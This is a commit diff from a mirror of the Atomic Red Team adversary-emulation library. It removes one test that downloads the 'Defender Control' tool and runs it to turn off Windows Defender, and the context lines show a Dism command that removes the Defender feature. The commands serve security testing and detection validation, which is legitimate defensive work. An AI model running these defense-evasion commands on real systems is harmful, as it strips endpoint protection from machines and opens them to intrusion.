security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

removing: Disable Defender with Defender Control (#2461)

Browse Source
This commit is contained in:
Carrie Roberts
2023-06-15 09:28:12 -07:00
committed by GitHub
parent cef46e4479
commit db1a2cf461
1 changed files with 1 additions and 32 deletions
Download Patch File Download Diff File Expand all files Collapse all files
atomics/T1562.001/T1562.001.yaml
+1 -32
View File
@@ -551,38 +551,7 @@ atomic_tests:
Dism /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart /quiet
name: command_prompt
elevation_required: true
- name: Disable Defender with Defender Control
auto_generated_guid: 178136d8-2778-4d7a-81f3-d517053a4fd6
description: |
Attempting to use Defender Control software to disable Windows Defender. Upon successful execution, Windows Defender will be turned off.
supported_platforms:
- windows
input_arguments:
DefenderID:
description: Defender ID that is used as a sort of passcode to disable it within Defender Control from the command line. The machine-specific Defender ID can be obtained within Defender Control by going to menu, command line info, and then retrieving the 4 character passcode to continue (listed after defendercontrol /d /id in the command line info window).
type: string
default: FFFF
DefenderControlExe:
description: Path to Defender Control software version 1.6.
type: string
default: PathToAtomicsFolder\..\ExternalPayloads\DefenderControl\DefenderControl\DefenderControl.exe
dependency_executor_name: powershell
dependencies:
- description: |
Defender Control must be installed on the machine.
prereq_command: |
if (Test-Path #{DefenderControlExe}) {exit 0} else {exit 1}
get_prereq_command: |
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://web.archive.org/web/20201210152711/https://www.sordum.org/files/download/defender-control/DefenderControl.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\defendercontrol.zip"
expand-archive -LiteralPath "PathToAtomicsFolder\..\ExternalPayloads\defendercontrol.zip" -DestinationPath "PathToAtomicsFolder\..\ExternalPayloads\DefenderControl"
executor:
command: |
cmd /c #{DefenderControlExe} /D #{DefenderID} | Out-Null
cleanup_command: |
cmd /c #{DefenderControlExe} /E | Out-Null
name: powershell
elevation_required: true
- name: Disable Defender Using NirSoft AdvancedRun
auto_generated_guid: 81ce22fd-9612-4154-918e-8a1f285d214d
description: |